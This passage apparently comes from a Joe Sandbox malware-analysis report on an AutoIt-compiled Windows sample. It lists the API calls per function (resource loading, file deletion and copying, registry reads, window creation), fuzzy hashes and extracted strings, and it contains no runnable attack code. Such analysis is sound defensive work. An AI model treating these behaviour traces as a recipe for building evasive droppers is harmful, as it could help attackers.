                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                  • String ID:
                                                                  • API String ID: 1986165174-0
                                                                  • Opcode ID: 479aa193ed7e6af4f789a55727d7055229d62bcc3004978674eb35df182a9c37
                                                                  • Instruction ID: 6d380ea40e1c0d6267ffc43da03bbd81f77331701eec28e7ac116824720872c3
                                                                  • Opcode Fuzzy Hash: 479aa193ed7e6af4f789a55727d7055229d62bcc3004978674eb35df182a9c37
                                                                  • Instruction Fuzzy Hash: 2B91E63198EBD8DEC731CB7894501BBBFF5BF2A300B4449AED1CB93A42D224A548D759

                                                                  Control-flow Graph

                                                                  Control-flow graph (rendered graph not reproduced): function starting at 8f4e89, basic blocks in 8f4e89-8f4ec6 and 92d933-92d98b; calls CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource.
                                                                  APIs
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008F4D8E,?,?,00000000,00000000), ref: 008F4E99
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008F4D8E,?,?,00000000,00000000), ref: 008F4EB0
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,008F4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008F4E2F), ref: 0092D937
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,008F4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008F4E2F), ref: 0092D94C
                                                                  • LockResource.KERNEL32(008F4D8E,?,?,008F4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008F4E2F,00000000), ref: 0092D95F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: 91b50fe47f6e56e55f9f719e2ba6c49cb44ccfe9f041a0ec1b291924eacf3e41
                                                                  • Instruction ID: 9ea2dfd885dc30df841cabebe132d6fe105e27ae2265673c4203b01e86eb321e
                                                                  • Opcode Fuzzy Hash: 91b50fe47f6e56e55f9f719e2ba6c49cb44ccfe9f041a0ec1b291924eacf3e41
                                                                  • Instruction Fuzzy Hash: 1F119E75200304BFD7208B65EC48F677BBAFFC5B21F204269F61AD6250DB61EC40D660
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID:
                                                                  • API String ID: 3964851224-0
                                                                  • Opcode ID: be8b3242b62e7c23d0871416cde17a4a56d5227b2d67b31005a6a2a69f071fab
                                                                  • Instruction ID: 1f3b10f11ed3cca11f2afe6c13f6c9da5d0d075eee5befb1a8bd91b7829e5b95
                                                                  • Opcode Fuzzy Hash: be8b3242b62e7c23d0871416cde17a4a56d5227b2d67b31005a6a2a69f071fab
                                                                  • Instruction Fuzzy Hash: 939259706083458FD720DF28C480B6ABBE5BF85304F15896DE99A8B3A2D775EC45CF92
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,0092E398), ref: 0095446A
                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 0095447B
                                                                  • FindClose.KERNEL32(00000000), ref: 0095448B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: 8503b98c6f8934d0d655c6a309ad03bba8fa2ce18f5e36c33253fd8f66a2d84f
                                                                  • Instruction ID: 342b87fd147e492ba49cd9245863f320f62a5f0ebaa253ccd4d46217a4ca2b74
                                                                  • Opcode Fuzzy Hash: 8503b98c6f8934d0d655c6a309ad03bba8fa2ce18f5e36c33253fd8f66a2d84f
                                                                  • Instruction Fuzzy Hash: 1FE0D833428500674610AF39EC0D4E9779C9F0537AF100715FC39D10E0E7745984A796
                                                                  Strings
                                                                  • Variable must be of type 'Object'., xrefs: 00933E62
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Variable must be of type 'Object'.
                                                                  • API String ID: 0-109567571
                                                                  • Opcode ID: 879c796b6b7a6b68611e2c7761a14e33bba8899d63e342335064bb3aa81693b5
                                                                  • Instruction ID: 43ba7f2c16345c063ec0ba216574686ec65c435d6dd910999409589569e1d351
                                                                  • Opcode Fuzzy Hash: 879c796b6b7a6b68611e2c7761a14e33bba8899d63e342335064bb3aa81693b5
                                                                  • Instruction Fuzzy Hash: F2A27B75A0021DCFCB24CF68C480ABAB7B2FF58314F248169EA55EB361D775AD42CB91
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00900A5B
                                                                  • timeGetTime.WINMM ref: 00900D16
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00900E53
                                                                  • Sleep.KERNEL32(0000000A), ref: 00900E61
                                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00900EFA
                                                                  • DestroyWindow.USER32 ref: 00900F06
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00900F20
                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00934E83
                                                                  • TranslateMessage.USER32(?), ref: 00935C60
                                                                  • DispatchMessageW.USER32(?), ref: 00935C6E
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00935C82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                  • API String ID: 4212290369-3242690629
                                                                  • Opcode ID: c139d928bc72d7608e25fd6f459e0aea4453cf51f86731434e7027eb3e9f2dde
                                                                  • Instruction ID: 29e63546ab5f4eceb11c0d4e5bcd706ad81aaffb2f83fb74a13a5487004c8088
                                                                  • Opcode Fuzzy Hash: c139d928bc72d7608e25fd6f459e0aea4453cf51f86731434e7027eb3e9f2dde
                                                                  • Instruction Fuzzy Hash: 88B2DF70608741DFD728DF24C884BAAB7E9FF88304F15491DE59A972A1CB75E884DF82

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00958F5F: __time64.LIBCMT ref: 00958F69
                                                                    • Part of subcall function 008F4EE5: _fseek.LIBCMT ref: 008F4EFD
                                                                  • __wsplitpath.LIBCMT ref: 00959234
                                                                    • Part of subcall function 009140FB: __wsplitpath_helper.LIBCMT ref: 0091413B
                                                                  • _wcscpy.LIBCMT ref: 00959247
                                                                  • _wcscat.LIBCMT ref: 0095925A
                                                                  • __wsplitpath.LIBCMT ref: 0095927F
                                                                  • _wcscat.LIBCMT ref: 00959295
                                                                  • _wcscat.LIBCMT ref: 009592A8
                                                                    • Part of subcall function 00958FA5: _memmove.LIBCMT ref: 00958FDE
                                                                    • Part of subcall function 00958FA5: _memmove.LIBCMT ref: 00958FED
                                                                  • _wcscmp.LIBCMT ref: 009591EF
                                                                    • Part of subcall function 00959734: _wcscmp.LIBCMT ref: 00959824
                                                                    • Part of subcall function 00959734: _wcscmp.LIBCMT ref: 00959837
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00959452
                                                                  • _wcsncpy.LIBCMT ref: 009594C5
                                                                  • DeleteFileW.KERNEL32(?,?), ref: 009594FB
                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00959511
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00959522
                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00959534
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                  • String ID:
                                                                  • API String ID: 1500180987-0
                                                                  • Opcode ID: 7148c4800ca19ed6e347f3b71ae94e379dca37e563746256ddae9433e710d111
                                                                  • Instruction ID: 6bcfe29739a52b68e90cda16f88b6de852ca2269bccf87dd7c558116d0c261c1
                                                                  • Opcode Fuzzy Hash: 7148c4800ca19ed6e347f3b71ae94e379dca37e563746256ddae9433e710d111
                                                                  • Instruction Fuzzy Hash: 12C10EB1D0021DAADF11DFA5CC85ADEB7BDEF85310F0044A6FA09E7151EB309A898F65

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008F3074
                                                                  • RegisterClassExW.USER32(00000030), ref: 008F309E
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F30AF
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 008F30CC
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F30DC
                                                                  • LoadIconW.USER32(000000A9), ref: 008F30F2
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F3101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: 72fa0a09a0a3c7f1a660ef671c24706bfbd8dffb3e68840fe7a681a89d1de6bc
                                                                  • Instruction ID: 743f0e9773b36976256c4382f41aeca9ff710fb6f77a66b3e0103a84707e83ea
                                                                  • Opcode Fuzzy Hash: 72fa0a09a0a3c7f1a660ef671c24706bfbd8dffb3e68840fe7a681a89d1de6bc
                                                                  • Instruction Fuzzy Hash: 82314972959349AFDB11CFA4E885B8DBBF0FB08320F14462EE584E62A0D3B50585DF40

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008F3074
                                                                  • RegisterClassExW.USER32(00000030), ref: 008F309E
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F30AF
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 008F30CC
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F30DC
                                                                  • LoadIconW.USER32(000000A9), ref: 008F30F2
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F3101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: 6b398a0b5fb08c6a288ea25a409171a026e839abf0c878da13307d6817acecc3
                                                                  • Instruction ID: cbf578758fb5b14b9fb48e5879b72d19b9f60301427bf0b60bb5989ade3a853e
                                                                  • Opcode Fuzzy Hash: 6b398a0b5fb08c6a288ea25a409171a026e839abf0c878da13307d6817acecc3
                                                                  • Instruction Fuzzy Hash: 8621C9B2969218AFDB00DFA4ED49B9DBBF4FB08710F10422AF514B62A0D7B14584DF95

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 008F4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B52F8,?,008F37AE,?), ref: 008F4724
                                                                    • Part of subcall function 0091050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008F7165), ref: 0091052D
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008F71A8
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0092E8C8
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0092E909
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0092E947
                                                                  • _wcscat.LIBCMT ref: 0092E9A0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                  • API String ID: 2673923337-2727554177
                                                                  • Opcode ID: be55a720a02ed08af8612fc00f5bf83fc5072b507644a491fe21ba278128df2b
                                                                  • Instruction ID: e52cee4bda2fc391f92ffd99e25d1bf1534f9146bff53f935a143d8513e6d050
                                                                  • Opcode Fuzzy Hash: be55a720a02ed08af8612fc00f5bf83fc5072b507644a491fe21ba278128df2b
                                                                  • Instruction Fuzzy Hash: 6371E3315183059EE304EF29ED819ABBBF8FF85320F40062EF554C72A0DB74A988DB52

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008F3A50
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 008F3A5F
                                                                  • LoadIconW.USER32(00000063), ref: 008F3A76
                                                                  • LoadIconW.USER32(000000A4), ref: 008F3A88
                                                                  • LoadIconW.USER32(000000A2), ref: 008F3A9A
                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008F3AC0
                                                                  • RegisterClassExW.USER32(?), ref: 008F3B16
                                                                    • Part of subcall function 008F3041: GetSysColorBrush.USER32(0000000F), ref: 008F3074
                                                                    • Part of subcall function 008F3041: RegisterClassExW.USER32(00000030), ref: 008F309E
                                                                    • Part of subcall function 008F3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F30AF
                                                                    • Part of subcall function 008F3041: InitCommonControlsEx.COMCTL32(?), ref: 008F30CC
                                                                    • Part of subcall function 008F3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F30DC
                                                                    • Part of subcall function 008F3041: LoadIconW.USER32(000000A9), ref: 008F30F2
                                                                    • Part of subcall function 008F3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F3101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: 9052c59931aceacb00805a99b094085fa3f823feed913ed0345bd27bf79991d8
                                                                  • Instruction ID: a0f32f4924e3a72e712ef3cccf9220a306e31be1151115c10b45b666bc25585e
                                                                  • Opcode Fuzzy Hash: 9052c59931aceacb00805a99b094085fa3f823feed913ed0345bd27bf79991d8
                                                                  • Instruction Fuzzy Hash: 70217171D2A708AFDF15DFA4ED05B9D7BB0FB08721F00021AF614A62B1C3B55940AF80

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 008F36D2
                                                                  • KillTimer.USER32(?,00000001), ref: 008F36FC
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F371F
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F372A
                                                                  • CreatePopupMenu.USER32 ref: 008F373E
                                                                  • PostQuitMessage.USER32(00000000), ref: 008F374D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: 60d41cd4e0d20fb370c4e0559b2493c08ee857822ef24b875033855129e734d3
                                                                  • Instruction ID: b766834f1d72d5d9c3c596418325c7d62bff2c909819e4a872c37f92998040ad
                                                                  • Opcode Fuzzy Hash: 60d41cd4e0d20fb370c4e0559b2493c08ee857822ef24b875033855129e734d3
                                                                  • Instruction Fuzzy Hash: 504134B222960DBBDB257F78ED09BB93698FB10311F100235F702E62B5DB649E40B365

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                  • API String ID: 1825951767-3513169116
                                                                  • Opcode ID: 68d9b48a32cb1a14dcebce09abd5aeea48cda00b11566e3e4fe50b0974d44c0b
                                                                  • Instruction ID: 2e5b14ce0c64310c5f2b2cec124c0358424890f2c66b6fbeccd79da097612bf3
                                                                  • Opcode Fuzzy Hash: 68d9b48a32cb1a14dcebce09abd5aeea48cda00b11566e3e4fe50b0974d44c0b
                                                                  • Instruction Fuzzy Hash: 5DA1597291422D9ADB05EBB8DC91AFEBB78FF54310F40042AE616F7191EF745A08CB61

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01415521
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01415747
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                  • Instruction ID: 138406e8eccffdfdf7c4208fdde930f1419a84980caa13b0e925b70b596ae503
                                                                  • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                  • Instruction Fuzzy Hash: F5A15870E00208EBDB14CFA4D884BEEBBB5FF89304F20855AE205BB294D7759A41CF94

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F3A03
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F3A24
                                                                  • ShowWindow.USER32(00000000,?,?), ref: 008F3A38
                                                                  • ShowWindow.USER32(00000000,?,?), ref: 008F3A41
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: d4653c46a9c0f32715524e30a30efc68b352f499549c5d278cc1b9abe4ea2ec9
                                                                  • Instruction ID: 8c8fbdfe9fd3c236f171ff3509d9faeb5cffb04b3f6c6854dd0849125c9115c6
